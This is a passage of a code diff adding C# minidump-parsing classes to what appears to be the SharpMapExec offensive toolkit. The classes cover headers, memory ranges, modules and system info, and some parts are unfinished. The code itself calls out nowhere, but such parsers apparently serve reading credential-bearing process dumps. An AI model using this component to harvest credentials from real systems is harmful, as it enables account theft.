29	+	MiniDumpWithUnloadedModules = 0x00000020,
30	+	MiniDumpWithIndirectlyReferencedMemory = 0x00000040,
31	+	MiniDumpFilterModulePaths = 0x00000080,
32	+	MiniDumpWithProcessThreadData = 0x00000100,
33	+	MiniDumpWithPrivateReadWriteMemory = 0x00000200,
34	+	MiniDumpWithoutOptionalData = 0x00000400,
35	+	MiniDumpWithFullMemoryInfo = 0x00000800,
36	+	MiniDumpWithThreadInfo = 0x00001000,
37	+	MiniDumpWithCodeSegs = 0x00002000,
38	+	MiniDumpWithoutAuxiliaryState = 0x00004000,
39	+	MiniDumpWithFullAuxiliaryState = 0x00008000,
40	+	MiniDumpWithPrivateWriteCopyMemory = 0x00010000,
41	+	MiniDumpIgnoreInaccessibleMemory = 0x00020000,
42	+	MiniDumpWithTokenInformation = 0x00040000,
43	+	MiniDumpWithModuleHeaders = 0x00080000,
44	+	MiniDumpFilterTriage = 0x00100000,
45	+	MiniDumpValidTypeFlags = 0x001fffff
46	+	}
47	+
48	+	public static MinidumpHeader ParseHeader(Program.MiniDump minidump)
49	+	{
50	+	MinidumpHeader Header = new MinidumpHeader();
51	+	Header.Signature = Helpers.ReadString(minidump.fileBinaryReader, 4);
52	+	Header.Version = Helpers.ReadUInt16(minidump.fileBinaryReader);
53	+	Header.ImplementationVersion = Helpers.ReadUInt16(minidump.fileBinaryReader);
54	+	Header.NumberOfStreams = Helpers.ReadUInt32(minidump.fileBinaryReader);
55	+	Header.StreamDirectoryRva = Helpers.ReadUInt32(minidump.fileBinaryReader);
56	+	Header.CheckSum = Helpers.ReadUInt32(minidump.fileBinaryReader);
57	+	Header.Reserved = Helpers.ReadUInt32(minidump.fileBinaryReader);
58	+	Header.TimeDateStamp = Helpers.ReadUInt32(minidump.fileBinaryReader);
59	+	//Header.Flags = Helpers.ReadUInt32(fileBinaryReader);
60	+	Header.Flags = Enum.GetName(typeof(MINIDUMP_TYPE), Helpers.ReadUInt32(minidump.fileBinaryReader));
61	+
62	+	return Header;
63	+	}
64	+	}
65	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Streams/Memory64ListStream.cs

1	+	using System.Collections.Generic;
2	+	using System.IO;
3	+	using System.Linq;
4	+
5	+	namespace Minidump.Streams
6	+	{
7	+	public class MINIDUMP_MEMORY64
8	+	{
9	+	public struct MINIDUMP_MEMORY64_LIST
10	+	{
11	+	public long NumberOfMemoryRanges;
12	+	public long BaseRva;
13	+	public List<MINIDUMP_MEMORY_DESCRIPTOR64> MemoryRanges;
14	+	}
15	+
16	+	public static MINIDUMP_MEMORY64_LIST parse_mml(BinaryReader fileBinaryReader)
17	+	{
18	+	MINIDUMP_MEMORY64_LIST mml = new MINIDUMP_MEMORY64_LIST();
19	+	mml.NumberOfMemoryRanges = Helpers.ReadInt64(fileBinaryReader);
20	+	mml.BaseRva = Helpers.ReadInt64(fileBinaryReader);
21	+	List<MINIDUMP_MEMORY_DESCRIPTOR64> list = new List<MINIDUMP_MEMORY_DESCRIPTOR64>();
22	+	foreach (var _ in Enumerable.Range(0, (int)mml.NumberOfMemoryRanges))
23	+	{
24	+	list.Add(parse_mmd(fileBinaryReader));
25	+	}
26	+
27	+	mml.MemoryRanges = list;
28	+	return mml;
29	+	}
30	+
31	+	public struct MINIDUMP_MEMORY_DESCRIPTOR64
32	+	{
33	+	public long StartOfMemoryRange;
34	+	public long DataSize;
35	+	}
36	+
37	+	public static MINIDUMP_MEMORY_DESCRIPTOR64 parse_mmd(BinaryReader fileBinaryReader)
38	+	{
39	+	MINIDUMP_MEMORY_DESCRIPTOR64 md = new MINIDUMP_MEMORY_DESCRIPTOR64();
40	+	md.StartOfMemoryRange = Helpers.ReadInt64(fileBinaryReader);
41	+	md.DataSize = Helpers.ReadInt64(fileBinaryReader);
42	+	return md;
43	+	}
44	+
45	+	public struct MinidumpMemory64List
46	+	{
47	+	public List<MinidumpMemory.MinidumpMemorySegment> memory_segments;
48	+	}
49	+
50	+	public static MinidumpMemory64List parse(Directory.MINIDUMP_DIRECTORY dir, Program.MiniDump minidump)
51	+	{
52	+	List<MinidumpMemory.MinidumpMemorySegment> list = new List<MinidumpMemory.MinidumpMemorySegment>();
53	+	MinidumpMemory64List mmlist = new MinidumpMemory64List();
54	+
55	+	minidump.fileBinaryReader.BaseStream.Seek(dir.Offset, 0);
56	+	byte[] chunk = minidump.fileBinaryReader.ReadBytes((int)dir.Size);
57	+
58	+	using (BinaryReader ChunkReader = new BinaryReader(new MemoryStream(chunk)))
59	+	{
60	+	var mtl = parse_mml(ChunkReader);
61	+	var rva = mtl.BaseRva;
62	+	foreach (MINIDUMP_MEMORY_DESCRIPTOR64 mod in mtl.MemoryRanges)
63	+	{
64	+	list.Add(MinidumpMemory.parse_full(mod, rva));
65	+	rva += mod.DataSize;
66	+	}
67	+	}
68	+
69	+	mmlist.memory_segments = list;
70	+	return mmlist;
71	+	}
72	+	}
73	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Streams/Memory86ListStream.cs

1	+	using System;
2	+	using System.Collections.Generic;
3	+	using System.IO;
4	+	using System.Linq;
5	+
6	+	namespace Minidump.Streams
7	+	{
8	+	public class MINIDUMP_MEMORY86
9	+	{
10	+	public struct MINIDUMP_MEMORY_LIST
11	+	{
12	+	public UInt32 NumberOfMemoryRanges;
13	+	public List<object> MemoryRanges;
14	+	}
15	+
16	+	public static MINIDUMP_MEMORY_LIST parse_mml(BinaryReader fileBinaryReader)
17	+	{
18	+	var mml = new MINIDUMP_MEMORY_LIST();
19	+	mml.NumberOfMemoryRanges = Helpers.ReadUInt32(fileBinaryReader);
20	+	foreach (var _ in Enumerable.Range(0, (int)mml.NumberOfMemoryRanges))
21	+	{
22	+	mml.MemoryRanges.Add(parse_mmd(fileBinaryReader));
23	+	}
24	+	return mml;
25	+	}
26	+
27	+	public struct MINIDUMP_MEMORY_DESCRIPTORx86
28	+	{
29	+	public UInt64 StartOfMemoryRange;
30	+	public UInt32 MemoryLocation;
31	+
32	+	//we do not use MemoryLocation but immediately store its fields in this object for easy access
33	+	public UInt32 DataSize;
34	+
35	+	public UInt32 Rva;
36	+	}
37	+
38	+	public static MINIDUMP_MEMORY_DESCRIPTORx86 parse_mmd(BinaryReader fileBinaryReader)
39	+	{
40	+	var md = new MINIDUMP_MEMORY_DESCRIPTORx86();
41	+	md.StartOfMemoryRange = Helpers.ReadUInt64(fileBinaryReader);
42	+	//MemoryLocation = parse_mld(fileBinaryReader);
43	+	//md.DataSize = md.MemoryLocation.DataSize;
44	+	//md.Rva = md.MemoryLocation.Rva;
45	+	return md;
46	+	}
47	+
48	+	public struct MinidumpMemory86List
49	+	{
50	+	public List<MinidumpMemory.MinidumpMemorySegment> memory_segments;
51	+	}
52	+
53	+	public static MinidumpMemory86List parse(Directory.MINIDUMP_DIRECTORY dir, Program.MiniDump minidump)
54	+	{
55	+	List<MinidumpMemory.MinidumpMemorySegment> list = new List<MinidumpMemory.MinidumpMemorySegment>();
56	+	MinidumpMemory86List mmlist = new MinidumpMemory86List();
57	+
58	+	minidump.fileBinaryReader.BaseStream.Seek(dir.Offset, 0);
59	+	byte[] chunk = minidump.fileBinaryReader.ReadBytes((int)dir.Size);
60	+
61	+	using (BinaryReader ChunkReader = new BinaryReader(new MemoryStream(chunk)))
62	+	{
63	+	var mtl = parse_mml(ChunkReader);
64	+	foreach (MINIDUMP_MEMORY_DESCRIPTORx86 mod in mtl.MemoryRanges)
65	+	{
66	+	//list.Add(parse_mini(mod, fileBinaryReader));
67	+	}
68	+	}
69	+
70	+	mmlist.memory_segments = list;
71	+	return mmlist;
72	+	}
73	+	}
74	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Streams/MinidumpMemory.cs

1	+	namespace Minidump.Streams
2	+	{
3	+	public class MinidumpMemory
4	+	{
5	+	public struct MinidumpMemorySegment
6	+	{
7	+	public long start_virtual_address;
8	+	public long size;
9	+	public long end_virtual_address;
10	+	public long start_file_address;
11	+	}
12	+
13	+	public static MinidumpMemorySegment parse_full(MINIDUMP_MEMORY64.MINIDUMP_MEMORY_DESCRIPTOR64 memory_decriptor, long rva)
14	+	{
15	+	MinidumpMemorySegment mms = new MinidumpMemorySegment();
16	+	mms.start_virtual_address = memory_decriptor.StartOfMemoryRange;
17	+	mms.size = memory_decriptor.DataSize;
18	+	mms.start_file_address = rva;
19	+	mms.end_virtual_address = mms.start_virtual_address + mms.size;
20	+
21	+	return mms;
22	+	}
23	+	}
24	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Streams/ModuleList.cs

1	+	using System;
2	+	using System.Collections.Generic;
3	+	using System.IO;
4	+	using System.Linq;
5	+
6	+	namespace Minidump.Streams
7	+	{
8	+	public class ModuleList
9	+	{
10	+	public struct MinidumpModule
11	+	{
12	+	public string name;
13	+	public long baseaddress;
14	+	public long size;
15	+	public long endaddress;
16	+	public VS_FIXEDFILEINFO versioninfo;
17	+	public long checksum;
18	+	public long timestamp;
19	+	}
20	+
21	+	public struct VS_FIXEDFILEINFO
22	+	{
23	+	public UInt32 dwSignature;
24	+	public UInt32 dwStrucVersion;
25	+	public UInt32 dwFileVersionMS;
26	+	public UInt32 dwFileVersionLS;
27	+	public UInt32 dwProductVersionMS;
28	+	public UInt32 dwProductVersionLS;
29	+	public UInt32 dwFileFlagsMask;
30	+	public UInt32 dwFileFlags;
31	+	public UInt32 dwFileOS;
32	+	public UInt32 dwFileType;
33	+	public UInt32 dwFileSubtype;
34	+	public UInt32 dwFileDateMS;
35	+	public UInt32 dwFileDateLS;
36	+	}
37	+
38	+	public struct MINIDUMP_MODULE
39	+	{
40	+	public long BaseOfImage;
41	+	public long SizeOfImage;
42	+	public long CheckSum;
43	+	public long TimeDateStamp;
44	+	public long ModuleNameRva;
45	+	public VS_FIXEDFILEINFO VersionInfo;
46	+	public MINIDUMP_LOCATION_DESCRIPTOR CvRecord;
47	+	public MINIDUMP_LOCATION_DESCRIPTOR MiscRecord;
48	+	public UInt64 Reserved0;
49	+	public UInt64 Reserved1;
50	+	}
51	+
52	+	public struct MINIDUMP_MODULE_LIST
53	+	{
54	+	public int NumberOfModules;
55	+	public List<MINIDUMP_MODULE> Modules;
56	+	}
57	+
58	+	public struct MINIDUMP_LOCATION_DESCRIPTOR
59	+	{
60	+	public UInt32 Size;
61	+	public UInt32 Rva;
62	+	}
63	+
64	+	public static MinidumpModule parse_mod(MINIDUMP_MODULE mod, BinaryReader fileBinaryReader)
65	+	{
66	+	MinidumpModule mm = new MinidumpModule();
67	+	mm.baseaddress = mod.BaseOfImage;
68	+	mm.size = mod.SizeOfImage;
69	+	mm.checksum = mod.CheckSum;
70	+	mm.timestamp = mod.TimeDateStamp;
71	+	mm.name = Helpers.get_from_rva((int)mod.ModuleNameRva, fileBinaryReader);
72	+	mm.versioninfo = mod.VersionInfo;
73	+	mm.endaddress = (mm.baseaddress + mod.SizeOfImage);
74	+	return mm;
75	+	}
76	+
77	+	public static MINIDUMP_LOCATION_DESCRIPTOR parse_mld(BinaryReader fileBinaryReader)
78	+	{
79	+	MINIDUMP_LOCATION_DESCRIPTOR mld = new MINIDUMP_LOCATION_DESCRIPTOR();
80	+
81	+	mld.Size = Helpers.ReadUInt32(fileBinaryReader);
82	+	mld.Rva = Helpers.ReadUInt32(fileBinaryReader);
83	+
84	+	return mld;
85	+	}
86	+
87	+	public static VS_FIXEDFILEINFO parse_vf(BinaryReader fileBinaryReader)
88	+	{
89	+	VS_FIXEDFILEINFO vf = new VS_FIXEDFILEINFO();
90	+	vf.dwSignature = Helpers.ReadUInt32(fileBinaryReader);
91	+	vf.dwStrucVersion = Helpers.ReadUInt32(fileBinaryReader);
92	+	vf.dwFileVersionMS = Helpers.ReadUInt32(fileBinaryReader);
93	+	vf.dwFileVersionLS = Helpers.ReadUInt32(fileBinaryReader);
94	+	vf.dwProductVersionMS = Helpers.ReadUInt32(fileBinaryReader);
95	+	vf.dwProductVersionLS = Helpers.ReadUInt32(fileBinaryReader);
96	+	vf.dwFileFlagsMask = Helpers.ReadUInt32(fileBinaryReader);
97	+	vf.dwFileFlags = Helpers.ReadUInt32(fileBinaryReader);
98	+	vf.dwFileOS = Helpers.ReadUInt32(fileBinaryReader);
99	+	vf.dwFileType = Helpers.ReadUInt32(fileBinaryReader);
100	+	vf.dwFileSubtype = Helpers.ReadUInt32(fileBinaryReader);
101	+	vf.dwFileDateMS = Helpers.ReadUInt32(fileBinaryReader);
102	+	vf.dwFileDateLS = Helpers.ReadUInt32(fileBinaryReader);
103	+	return vf;
104	+	}
105	+
106	+	public static MINIDUMP_MODULE parse_mm(BinaryReader fileBinaryReader)
107	+	{
108	+	MINIDUMP_MODULE mm = new MINIDUMP_MODULE();
109	+	mm.BaseOfImage = Helpers.ReadInt64(fileBinaryReader);
110	+	mm.SizeOfImage = Helpers.ReadUInt32(fileBinaryReader);
111	+	mm.CheckSum = Helpers.ReadUInt32(fileBinaryReader);
112	+	mm.TimeDateStamp = Helpers.ReadUInt32(fileBinaryReader);
113	+	mm.ModuleNameRva = Helpers.ReadUInt32(fileBinaryReader);
114	+	mm.VersionInfo = parse_vf(fileBinaryReader);
115	+	mm.CvRecord = parse_mld(fileBinaryReader);
116	+	mm.MiscRecord = parse_mld(fileBinaryReader);
117	+	mm.Reserved0 = Helpers.ReadUInt64(fileBinaryReader);
118	+	mm.Reserved1 = Helpers.ReadUInt64(fileBinaryReader);
119	+	return mm;
120	+	}
121	+
122	+	public static MINIDUMP_MODULE_LIST parse_mml(BinaryReader fileBinaryReader)
123	+	{
124	+	MINIDUMP_MODULE_LIST mml = new MINIDUMP_MODULE_LIST();
125	+	List<MINIDUMP_MODULE> modules = new List<MINIDUMP_MODULE>();
126	+
127	+	mml.NumberOfModules = Helpers.ReadInt32(fileBinaryReader);
128	+	foreach (var _ in Enumerable.Range(0, mml.NumberOfModules))
129	+	{
130	+	MINIDUMP_MODULE module = parse_mm(fileBinaryReader);
131	+	modules.Add(module);
132	+	}
133	+
134	+	mml.Modules = modules;
135	+	return mml;
136	+	}
137	+
138	+	public static List<MinidumpModule> parse(Directory.MINIDUMP_DIRECTORY dir, Program.MiniDump minidump)
139	+	{
140	+	List<MinidumpModule> list = new List<MinidumpModule>();
141	+	minidump.fileBinaryReader.BaseStream.Seek(dir.Offset, 0);
142	+	byte[] chunk = minidump.fileBinaryReader.ReadBytes((int)dir.Size);
143	+
144	+	using (BinaryReader ChunkReader = new BinaryReader(new MemoryStream(chunk)))
145	+	{
146	+	MINIDUMP_MODULE_LIST mtl = parse_mml(ChunkReader);
147	+	foreach (MINIDUMP_MODULE mod in mtl.Modules)
148	+	{
149	+	MinidumpModule module = parse_mod(mod, minidump.fileBinaryReader);
150	+	list.Add(module);
151	+	}
152	+	}
153	+	return list;
154	+	}
155	+	}
156	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Streams/Parse.cs

1	+	using System.Collections.Generic;
2	+
3	+	namespace Minidump.Streams
4	+	{
5	+	internal class Parse
6	+	{
7	+	public static int parseMM(ref Program.MiniDump minidump, List<Directory.MINIDUMP_DIRECTORY> directories)
8	+	{
9	+	foreach (Directory.MINIDUMP_DIRECTORY dir in directories)
10	+	{
11	+	if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.UnusedStream)
12	+	{
13	+	//Console.WriteLine($"Found UnusedStream {dir.Offset} {dir.Size} Size");
14	+	continue; //Reserved. Do not use this enumeration value.
15	+	}
16	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.ReservedStream0)
17	+	{
18	+	//Console.WriteLine($"Found ReservedStream0 {dir.Offset} {dir.Size} Size");
19	+	continue; // Reserved. Do not use this enumeration value.
20	+	}
21	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.ReservedStream1)
22	+	{
23	+	//Console.WriteLine($"Found ReservedStream1 {dir.Offset} {dir.Size} Size");
24	+	continue; // Reserved. Do not use this enumeration value.
25	+	}
26	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.ThreadListStream)
27	+	{
28	+	//Console.WriteLine($"Found ThreadListStream {dir.Offset} {dir.Size} Size");
29	+	//threads = MinidumpThreadList.parse(dir, file_handle);
30	+	continue;
31	+	}
32	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.ModuleListStream)
33	+	{
34	+	//Console.WriteLine($"Found ModuleListStream {dir.Offset} {dir.Size} Size");
35	+	minidump.modules = ModuleList.parse(dir, minidump);
36	+	continue; //Console.WriteLine(str(modules_list))
37	+	}
38	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.MemoryListStream)
39	+	{
40	+	//Console.WriteLine($"Found MemoryListStream {dir.Offset} {dir.Size} Size");
41	+	//memory_segments = MinidumpMemoryList.parse(dir, minidump);
42	+	continue; //Console.WriteLine(str(memory_segments))
43	+	}
44	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.SystemInfoStream)
45	+	{
46	+	//Console.WriteLine($"Found SystemInfoStream {dir.Offset} {dir.Size} Size");
47	+	minidump.sysinfo = SystemInfo.parse(dir, minidump);
48	+	continue; //Console.WriteLine(str(sysinfo))
49	+	}
50	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.ThreadExListStream)
51	+	{
52	+	//Console.WriteLine($"Found ThreadExListStream {dir.Offset} {dir.Size} Size");
53	+	//threads_ex = MinidumpThreadExList.parse(dir, file_handle);
54	+	continue; //Console.WriteLine(str(threads_ex))
55	+	}
56	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.Memory64ListStream)
57	+	{
58	+	//Console.WriteLine($"Found Memory64ListStream {dir.Offset} {dir.Size} Size");
59	+	minidump.memory_segments_64 = MINIDUMP_MEMORY64.parse(dir, minidump);
60	+	continue; //Console.WriteLine(str(memory_segments_64))
61	+	}
62	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.CommentStreamA)
63	+	{
64	+	//Console.WriteLine($"Found CommentStreamA {dir.Offset} {dir.Size} Size");
65	+	//comment_a = CommentStreamA.parse(dir, file_handle);
66	+	continue; //Console.WriteLine(str(comment_a))
67	+	}
68	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.CommentStreamW)
69	+	{
70	+	//Console.WriteLine($"Found CommentStreamW {dir.Offset} {dir.Size} Size");
71	+	//comment_w = CommentStreamW.parse(dir, file_handle);
72	+	continue; //Console.WriteLine(str(comment_w))
73	+	}
74	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.ExceptionStream)
75	+	{
76	+	//Console.WriteLine($"Found ExceptionStream {dir.Offset} {dir.Size} Size");
77	+	//exception = ExceptionList.parse(dir, file_handle);
78	+	continue; //Console.WriteLine(str(comment_w))
79	+	}
80	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.HandleDataStream)
81	+	{
82	+	//Console.WriteLine($"Found HandleDataStream {dir.Offset} {dir.Size} Size");
83	+	//handles = MinidumpHandleDataStream.parse(dir, file_handle);
84	+	continue; //Console.WriteLine(str(handles))
85	+	}
86	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.FunctionTableStream)
87	+	{
88	+	//Console.WriteLine($"Found FunctionTableStream {dir.Offset} {dir.Size} Size");
89	+	//Console.WriteLine($"Parsing of this stream type is not yet implemented!");
90	+	continue;
91	+	}
92	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.UnloadedModuleListStream)
93	+	{
94	+	//Console.WriteLine($"Found UnloadedModuleListStream {dir.Offset} {dir.Size} Size");
95	+	//unloaded_modules = MinidumpUnloadedModuleList.parse(dir, file_handle);
96	+	continue; //Console.WriteLine(str(unloaded_modules))
97	+	}
98	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.MiscInfoStream)
99	+	{
100	+	//Console.WriteLine($"Found MiscInfoStream {dir.Offset} {dir.Size} Size");
101	+	//misc_info = MinidumpMiscInfo.parse(dir, file_handle);
102	+	//Console.WriteLine(str(misc_info))
103	+	continue;
104	+	}
105	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.MemoryInfoListStream)
106	+	{
107	+	//Console.WriteLine($"Found MemoryInfoListStream {dir.Offset} {dir.Size} Size");
108	+	//memory_info = MinidumpMemoryInfoList.parse(dir, file_handle);
109	+	//Console.WriteLine(str(memory_info))
110	+	continue;
111	+	}
112	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.ThreadInfoListStream)
113	+	{
114	+	//Console.WriteLine($"Found ThreadInfoListStream {dir.Offset} {dir.Size} Size");
115	+	//thread_info = MinidumpThreadInfoList.parse(dir, file_handle);
116	+	//Console.WriteLine(thread_info);
117	+	continue;
118	+	}
119	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.SystemMemoryInfoStream)
120	+	{
121	+	//Console.WriteLine($"Found SystemMemoryInfoStream {dir.Offset} {dir.Size} Size");
122	+	//Console.WriteLine($"SystemMemoryInfoStream parsing is not implemented (Missing documentation)");
123	+	continue;
124	+	}
125	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.JavaScriptDataStream)
126	+	{
127	+	//Console.WriteLine($"Found JavaScriptDataStream {dir.Offset} {dir.Size} Size");
128	+	//Console.WriteLine($"JavaScriptDataStream parsing is not implemented (Missing documentation)");
129	+	}
130	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.ProcessVmCountersStream)
131	+	{
132	+	//Console.WriteLine($"Found ProcessVmCountersStream {dir.Offset} {dir.Size} Size");
133	+	//Console.WriteLine($"ProcessVmCountersStream parsing is not implemented (Missing documentation)");
134	+	}
135	+	else if (dir.StreamType == Directory.MINIDUMP_STREAM_TYPE.TokenStream)
136	+	{
137	+	//Console.WriteLine($"Found TokenStream {dir.Offset} {dir.Size} Size");
138	+	//Console.WriteLine($"TokenStream parsing is not implemented (Missing documentation)");
139	+	}
140	+	else
141	+	{
142	+	//Console.WriteLine($"Found Unknown Stream! Type {dir.StreamType}, {dir.Offset}, {dir.Size})");
143	+	}
144	+	}
145	+	return 0;
146	+	}
147	+	}
148	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Streams/SystemInfo.cs

1	+	using System;
2	+	using System.Collections.Generic;
3	+	using System.IO;
4	+	using System.Linq;
5	+
6	+	namespace Minidump.Streams
7	+	{
8	+	public class SystemInfo
9	+	{
10	+	[Flags]
11	+	public enum PROCESSOR_ARCHITECTURE
12	+	{
13	+	AMD64 = 9,
14	+	ARM = 5,
15	+	IA64 = 6,
16	+	INTEL = 0,
17	+	AARCH64 = 0x8003,
18	+	UNKNOWN = 0xffff
19	+	}
20	+
21	+	[Flags]
22	+	public enum PROCESSOR_LEVEL
23	+	{
24	+	INTEL_80386 = 3,
25	+	INTEL_80486 = 4,
26	+	INTEL_PENTIUM = 5,
27	+	INTEL_PENTIUM_PRO = 6
28	+	}
29	+
30	+	[Flags]
31	+	public enum PRODUCT_TYPE
32	+	{
33	+	VER_UNIDENTIFIED_PRODUCT = 0x0000000,
34	+	VER_NT_WORKSTATION = 0x0000001,
35	+	VER_NT_DOMAIN_CONTROLLER = 0x0000002,
36	+	VER_NT_SERVER = 0x0000003
37	+	}
38	+
39	+	[Flags]
40	+	public enum PLATFORM_ID
41	+	{
42	+	VER_PLATFORM_WIN32s = 0,
43	+	VER_PLATFORM_WIN32_WINDOWS = 1,
44	+	VER_PLATFORM_WIN32_NT = 2,
45	+	VER_PLATFORM_CRASHPAD_MAC = 0x8101,
46	+	VER_PLATFORM_CRASHPAD_IOS = 0x8102,
47	+	VER_PLATFORM_CRASHPAD_LINUX = 0x8201,
48	+	VER_PLATFORM_CRASHPAD_SOLARIS = 0x8202,
49	+	VER_PLATFORM_CRASHPAD_ANDROID = 0x8203,
50	+	VER_PLATFORM_CRASHPAD_PS3 = 0x8204,
51	+	VER_PLATFORM_CRASHPAD_NACL = 0x8205,
52	+	VER_PLATFORM_CRASHPAD_FUSCHIA = 0x8206,
53	+	VER_PLATFORM_CRASHPAD_UNKNOWN = 0xfffffff
54	+	}
55	+
56	+	[Flags]
57	+	public enum WindowsBuild
58	+	{
59	+	WIN_XP = 2600,
60	+	WIN_2K3 = 3790,
61	+	WIN_VISTA = 6000,
62	+	WIN_7 = 7600,
63	+	WIN_8 = 9200,
64	+	WIN_BLUE = 9600,
65	+	WIN_10_1507 = 10240,
66	+	WIN_10_1511 = 10586,
67	+	WIN_10_1607 = 14393,
68	+	WIN_10_1703 = 15063,
69	+	WIN_10_1709 = 16299,
70	+	WIN_10_1803 = 17134,
71	+	WIN_10_1809 = 17763,
72	+	WIN_10_1903 = 18362
73	+	}
74	+
75	+	[Flags]
76	+	public enum WindowsMinBuild
77	+	{
78	+	WIN_XP = 2500,
79	+	WIN_2K3 = 3000,
80	+	WIN_VISTA = 5000,
81	+	WIN_7 = 7000,
82	+	WIN_8 = 8000,
83	+	WIN_BLUE = 9400,
84	+	WIN_10 = 9800
85	+	}
86	+
87	+	[Flags]
88	+	public enum SUITE_MASK
89	+	{
90	+	VER_SUITE_BACKOFFICE = 0x00000004,
91	+	VER_SUITE_BLADE = 0x00000400,
92	+	VER_SUITE_COMPUTE_SERVER = 0x00004000,
93	+	VER_SUITE_DATACENTER = 0x00000080,
94	+	VER_SUITE_ENTERPRISE = 0x00000002,
95	+	VER_SUITE_EMBEDDEDNT = 0x00000040,
96	+	VER_SUITE_PERSONAL = 0x00000200,
97	+	VER_SUITE_SINGLEUSERTS = 0x00000100,
98	+	VER_SUITE_SMALLBUSINESS = 0x00000001,
99	+	VER_SUITE_SMALLBUSINESS_RESTRICTED = 0x00000020,
100	+	VER_SUITE_STORAGE_SERVER = 0x00002000,
101	+	VER_SUITE_TERMINAL = 0x00000010
102	+	}
103	+
104	+	public struct MINIDUMP_SYSTEM_INFO
105	+	{
106	+	public PROCESSOR_ARCHITECTURE ProcessorArchitecture;
107	+	public uint ProcessorLevel;
108	+	public uint ProcessorRevision;
109	+	public uint Reserved0;
110	+	public uint NumberOfProcessors;
111	+	public PRODUCT_TYPE ProductType;
112	+	public uint MajorVersion;
113	+	public uint MinorVersion;
114	+	public uint BuildNumber;
115	+	public PLATFORM_ID PlatformId;
116	+	public uint CSDVersionRva;
117	+	public int Reserved1;
118	+	public SUITE_MASK SuiteMask;
119	+	public int Reserved2;
120	+	public List<uint> VendorId;
121	+	public uint VersionInformation;
122	+	public uint FeatureInformation;
123	+	public uint AMDExtendedCpuFeatures;
124	+	public List<UInt64> ProcessorFeatures;
125	+
126	+	//for wrtier
127	+	public uint CSDVersion;
128	+
129	+	public int msv_dll_timestamp;
130	+	public string OS;
131	+	}
132	+
133	+	public static MINIDUMP_SYSTEM_INFO Parse(BinaryReader fileBinaryReader)
134	+	{
135	+	MINIDUMP_SYSTEM_INFO msi = new MINIDUMP_SYSTEM_INFO();
136	+
137	+	//msi.ProcessorArchitecture = Helpers.ReadUInt16(fileBinaryReader);
138	+	msi.ProcessorArchitecture = (PROCESSOR_ARCHITECTURE)Enum.Parse(typeof(PROCESSOR_ARCHITECTURE),
139	+	Enum.GetName(typeof(PROCESSOR_ARCHITECTURE), (int)Helpers.ReadUInt16(fileBinaryReader)));
140	+	msi.ProcessorLevel = Helpers.ReadUInt16(fileBinaryReader);
141	+	msi.ProcessorRevision = Helpers.ReadUInt16(fileBinaryReader);
142	+	//the below field is present in the documentation from MSDN, however is not present in the actual dump
143	+	//msi.Reserved0 = int.from_bytes(buff.read(2), byteorder = 'little', signed = False)
144	+	msi.NumberOfProcessors = Helpers.ReadInt8(fileBinaryReader);
145	+	//msi.ProductType = Helpers.ReadUInt8(fileBinaryReader);
146	+	msi.ProductType = (PRODUCT_TYPE)Enum.Parse(typeof(PRODUCT_TYPE), Enum.GetName(typeof(PRODUCT_TYPE), (int)Helpers.ReadInt8(fileBinaryReader)));
147	+	msi.MajorVersion = Helpers.ReadUInt32(fileBinaryReader);
148	+	msi.MinorVersion = Helpers.ReadUInt32(fileBinaryReader);
149	+	msi.BuildNumber = Helpers.ReadUInt32(fileBinaryReader);
150	+	//msi.PlatformId = Helpers.ReadUInt32(fileBinaryReader);
151	+	msi.PlatformId = (PLATFORM_ID)Enum.Parse(typeof(PLATFORM_ID), Enum.GetName(typeof(PLATFORM_ID), (int)Helpers.ReadUInt32(fileBinaryReader)));
152	+	msi.CSDVersionRva = Helpers.ReadUInt32(fileBinaryReader);
153	+	////msi.Reserved1 = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
154	+	////msi.SuiteMask = Helpers.ReadUInt16(fileBinaryReader);
155	+	int sm = Helpers.ReadUInt16(fileBinaryReader);
156	+	try
157	+	{
158	+	msi.SuiteMask = (SUITE_MASK)Enum.Parse(typeof(SUITE_MASK), Enum.GetName(typeof(SUITE_MASK), sm));
159	+	}
160	+	catch (Exception e)
161	+	{ }
162	+	msi.Reserved2 = Helpers.ReadUInt16(fileBinaryReader);
163	+	if (msi.ProcessorArchitecture == PROCESSOR_ARCHITECTURE.INTEL)
164	+	{
165	+	foreach (var _ in Enumerable.Range(0, 3))
166	+	{
167	+	msi.VendorId.Add(Helpers.ReadUInt32(fileBinaryReader));
168	+	}
169	+
170	+	msi.VersionInformation = Helpers.ReadUInt32(fileBinaryReader);
171	+	msi.FeatureInformation = Helpers.ReadUInt32(fileBinaryReader);
172	+	msi.AMDExtendedCpuFeatures = Helpers.ReadUInt32(fileBinaryReader);
173	+	}
174	+	else
175	+	{
176	+	foreach (var _ in Enumerable.Range(0, 2))
177	+	{
178	+	//fix this
179	+	//msi.ProcessorFeatures.Add(Helpers.ReadUInt64(fileBinaryReader));
